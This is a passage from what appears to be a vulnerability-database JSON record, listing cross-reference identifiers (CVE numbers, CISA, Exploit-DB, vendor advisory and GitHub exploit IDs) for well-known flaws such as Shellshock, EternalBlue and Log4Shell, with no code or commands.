"CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0900", "CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK102673", "CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:134C272F26FB005321448C648224EB02", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:2B970469D89016F563E142BE209443D8", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:6D325600F427E8426F81E5829305E20F", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:88950AD3AEDA1ACA038AD96EE5152D39", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:99DAB57F9B8063F8619B1A418B014DF1", "CISA:D70586B2C2D5D982D54DA686CCF0F4D1", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0158", "CISA-KEV-CVE-2012-0507", "CISA-KEV-CVE-2012-1723", "CISA-KEV-CVE-2013-0074", "CISA-KEV-CVE-2014-6271", "CISA-KEV-CVE-2014-7169", "CISA-KEV-CVE-2017-0143", "CISA-KEV-CVE-2017-0144", "CISA-KEV-CVE-2017-0145", "CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2017-8570", "CISA-KEV-CVE-2018-0798", "CISA-KEV-CVE-2018-0802", "CISA-KEV-CVE-2018-13379", "CISA-KEV-CVE-2018-8174", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2019-2725", "CISA-KEV-CVE-2020-1472", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2021-26855", "CISA-KEV-CVE-2021-31207", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2021-34523", "CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2021-45046"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH", "CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX200217", "CTX267027", "CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2011-3571", "CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-3671", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-62771", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7227", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0199", "CVE-2017-0243", "CVE-2017-11882", "CVE-2017-11884", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-3100", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:ACBAE732DF5CF430594D30872D7BB6CA:B482A", "DEBIAN:BFFF1A1BB8985A1554EE139FD940DFD1:B482A", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DLA-63-1:7012F", "DEBIAN:DSA-2420-1:46A36", "DEBIAN:DSA-2507-1:43C0F", "DEBIAN:DSA-3032-1:EB739", "DEBIAN:DSA-3035-1:8A617", "DEBIAN:DSA-3035-1:AEAF0", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-6271", "DEBIANCVE:CVE-2014-6277", "DEBIANCVE:CVE-2014-6278", "DEBIANCVE:CVE-2014-7169", "DEBIANCVE:CVE-2020-1472", "DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:18679", "EDB-ID:19717", "EDB-ID:29858", "EDB-ID:34777", "EDB-ID:34839", "EDB-ID:34879", "EDB-ID:35115", "EDB-ID:35146", "EDB-ID:37816", "EDB-ID:38849", "EDB-ID:39918", "EDB-ID:40619", "EDB-ID:40938", "EDB-ID:41702", "EDB-ID:41894", "EDB-ID:41934", "EDB-ID:43163", "EDB-ID:44263", "EDB-ID:46780", "EDB-ID:46814", "EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48651", "EDB-ID:49071", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592", "EDB-ID:51183"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:282B7A409B106ACEA21CAF83B6D41BAD", "EXPLOITPACK:35CA87EB321039B8FCD10FF7077070EC", "EXPLOITPACK:47FD05A7865BD1C6E41B36173837F9F9", "EXPLOITPACK:674E0F21E3254A3C7A39F2F66070C4E6", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8", "EXPLOITPACK:8D7CD3337FF4431147D67A3C62639747", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:B1EF149162970D578C2E9FBD8DA60CE1", "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:DECB95CED9B0E098AA11F83C84BC431D", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "f5", "idList": ["F5:K15629", "F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K57181937", "F5:K90059138", "F5:K93951507", "SOL15629"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:314802147E", "FEDORA:38D8230C58CD", "FEDORA:45E2C214D4", "FEDORA:4A64830CFCDC", "FEDORA:4A9CF241E0", "FEDORA:548FD3102AB0", "FEDORA:55FF821575", "FEDORA:59AA230A7074", "FEDORA:6FC4121113", "FEDORA:95A5B306879A", "FEDORA:9DB7C245AA", "FEDORA:9FE1722338", "FEDORA:A2C3F213B0", "FEDORA:A5A703103140", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:38120E3D3979DCD57297419690545DDD", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "FIREEYE:BC668B4C04AA2081781B46690DBFE96C", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "FIREEYE:EA53A360CCFA6225449677F13D34D788", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-14-030", "FG-IR-18-384", "FG-IR-20-233", "FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "71AD81DA-4414-11E4-A33E-3C970E169BC2", "81E2B308-4A6C-11E4-B711-6805CA0B3D42", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "gentoo", "idList": ["GLSA-201401-30", "GLSA-201406-32", "GLSA-201409-09", "GLSA-201409-10", "GLSA-202012-24"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "024D29D3-309F-5B7F-B8C9-2AF149F9A213", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "059DC199-E425-50EE-B5F5-E351E0323E69", "066BA250-177D-5017-9AC2-6B948A465ABC", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "114D719E-11FD-5F49-982D-CB278A7796DB", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "12E44744-1AF0-523A-ACA2-593B4D33E014", "13364575-934B-5E73-AA03-AEB6910F6AD2", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "14573955-860C-5947-8F2F-86347A606742", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "18D647E9-D7D4-5591-B16C-05D007AFD726", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "20B1E4FC-65ED-596C-8628-7E9871F2762B", "20E0E007-A9C4-58EA-917F-E225D8785B3F", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "2255B39F-1B91-56F4-A323-8704808620D3", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "256984DC-A742-53F8-889F-2071EC134734", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "2849E613-8689-58E7-9C55-A0616B66C91A", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "3019C843-FE2F-527C-B7C1-14A1C3066721", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31DB22CD-3492-524F-9D26-035FC1086A71", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "35B21CE7-1E51-5824-B70E-36480A6E8763", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39093366-D071-5898-A67D-A99B956B6E73", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3E66E49D-6A9B-530D-AF77-12B96257655A", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3F400483-1F7E-5BE5-8612-4D55D450D553", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "40FF072F-75B9-51E6-8B98-BB84CB3B734D", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "46FA259E-5429-580C-B1D5-D1F09EB90023", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49EC151F-12F0-59CF-960C-25BD54F46680", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AC49DB9-A784-561B-BF92-94209310B51B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F4AF4AC-0953-5098-98D6-592B918B0836", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5DB14853-1EDB-5A80-BD98-BB388CC80401", "5DD13827-3FCE-5166-806D-088441D41514", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62E1CDF6-537F-52B5-8ACE-87CDDFB3544D", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "63C36F7A-5F99-5A79-B99F-260360AC237F", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "6787DC40-24C2-5626-B213-399038EFB0E9", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "69FAE88E-7F22-5ACC-B555-3441BE00C566", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "7078ED42-959E-5242-BE9D-17F2F99C76A8", 